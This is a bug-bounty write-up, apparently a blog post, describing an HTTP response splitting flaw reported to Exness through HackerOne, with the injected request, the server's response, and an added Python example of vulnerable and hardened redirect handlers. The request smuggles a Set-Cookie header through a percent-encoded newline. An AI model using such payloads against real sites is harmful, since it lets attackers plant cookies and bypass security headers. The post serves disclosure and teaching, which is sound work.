Revealing the Intriguing HTTP Response Splitting Vulnerability | Bounty $200
Hey there, I’m Umair Farooqui, and I’m thrilled to take you on a journey through a fascinating discovery I made in the ever-evolving realm of cybersecurity. Imagine stumbling upon a hidden chink in the armor of one of the renowned online platforms — Exness.com. That’s precisely what happened to me, and today, I’m excited to share my experience of uncovering an HTTP response splitting vulnerability on Exness. I reported this issue via HackerOne and was generously rewarded with a $200 bounty. In this detailed blog post, I’ll walk you through how I found this vulnerability, the step-by-step process to reproduce it, and the profound impact it could have on web security.
Discovery and Reporting:
On March 16, 2022, I embarked on a journey that would eventually lead me to a vulnerability on Exness.com. This vulnerability allowed attackers to sneakily inject malicious headers into the HTTP responses, a sinister tactic often referred to as HTTP response splitting. These manipulated response headers could open up a Pandora’s box of potential security risks.
Steps to Reproduce:
Let’s dive into the exciting journey of how I unveiled this vulnerability, complete with an interactive experience.
Send a GET Request: Our adventure begins with a simple GET request to the target URL, in this case, https://redicted.com. The crucial twist in the tale is the payload we attach to the request, cleverly designed to trigger the vulnerability.
GET /%0Aset-cookie:%20mufazmi=socialcodia; HTTP/2
Host: www.redicted.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Observe the Response: As we send this intriguing request, the response will include a new header that we’ve artfully inserted:
Set-Cookie: mufazmi=socialcodia
Response Content: Our HTTP response indicates a redirection (HTTP 301 Moved Permanently). Here’s a peek at what it might look like:
HTTP/2 301 Moved Permanently
Date: Wed, 16 Mar 2022 22:15:24 GMT
Content-Type: text/html
Server: nginx/1.17.8
Location: /
Set-Cookie: mufazmi=socialcodia;

<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>
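To make the mechanism behind these steps concrete, here is an added example of my own (not Exness's server code or nginx): a minimal redirect handler that percent-decodes the request path into the Location header, the same handler hardened to refuse control characters, and a lenient header parser, like a browser's, that shows why the decoded %0A turns into an extra Set-Cookie header. The handler names, the 400 response and the benign "/account" path are constructed for the illustration; the payload path is the one from the request above.

```python
from __future__ import annotations
from urllib.parse import unquote

# Constructed request path modelled on the post's payload: a percent-encoded
# newline (%0A) followed by a header the attacker wants the server to emit.
CONSTRUCTED_PATH = "/%0Aset-cookie:%20mufazmi=socialcodia;"


def build_redirect_vulnerable(request_path: str) -> bytes:
    """Model of the flawed behaviour: the decoded path is copied verbatim into
    the Location header, so a decoded %0A ends that header line early."""
    location = unquote(request_path)  # "%0A" becomes a real "\n" here
    lines = [
        "HTTP/1.1 301 Moved Permanently",
        "Content-Type: text/html",
        f"Location: {location}",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def build_redirect_hardened(request_path: str) -> bytes:
    """Same handler with the fix: any header value containing CR, LF or NUL is
    rejected with a 400 instead of being written into the response."""
    location = unquote(request_path)
    if any(ch in location for ch in "\r\n\x00"):
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    lines = [
        "HTTP/1.1 301 Moved Permanently",
        "Content-Type: text/html",
        f"Location: {location}",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def parse_header_names(raw_response: bytes) -> list[str]:
    """Lenient header parser: like browsers, it accepts a bare LF as a line
    terminator, which is exactly why a decoded %0A splits the response."""
    head = raw_response.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    names = []
    for line in head.splitlines()[1:]:  # skip the status line
        if ":" in line:
            names.append(line.split(":", 1)[0].strip().lower())
    return names


if __name__ == "__main__":
    print(parse_header_names(build_redirect_vulnerable(CONSTRUCTED_PATH)))
    print(parse_header_names(build_redirect_hardened(CONSTRUCTED_PATH)))
```

The vulnerable variant reports a third header name, set-cookie, that the handler never intended to send, while the hardened variant never reaches the redirect at all.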
Impact:
Now, let’s unravel the significance of this discovery. The real power of this vulnerability lies in its ability to wreak havoc without requiring any user interaction. An attacker can exploit this by injecting malicious URLs or headers, as showcased earlier. This could have dire consequences, such as setting cookies for unsuspecting users on Exness.com or bypassing crucial security headers set by the server.
It’s worth noting that this vulnerability has its limitations, primarily because the request results in a redirect. This makes it challenging for attackers to execute other types of attacks like Cross-Site Scripting (XSS) or Cache Poisoning. Nevertheless, considering its potential for misuse without user interaction and the attacker’s ability to manipulate headers (including cookies), this vulnerability presents a considerable security risk.
Conclusion:
My journey of uncovering the HTTP response splitting vulnerability on Exness.com serves as a reminder of the ongoing importance of rigorous security testing and responsible disclosure. By identifying and reporting such vulnerabilities, we all contribute to a safer online environment.
I reported this vulnerability through HackerOne, and my efforts were duly recognized with a $200 bounty. This experience underscores the vital role that security researchers like myself play in the ongoing battle against cyber threats. As the digital landscape continues to evolve, it’s paramount for individuals and organizations alike to remain vigilant and proactive in addressing security vulnerabilities.
Stay curious, stay safe, and keep exploring the ever-changing world of cybersecurity! 🚀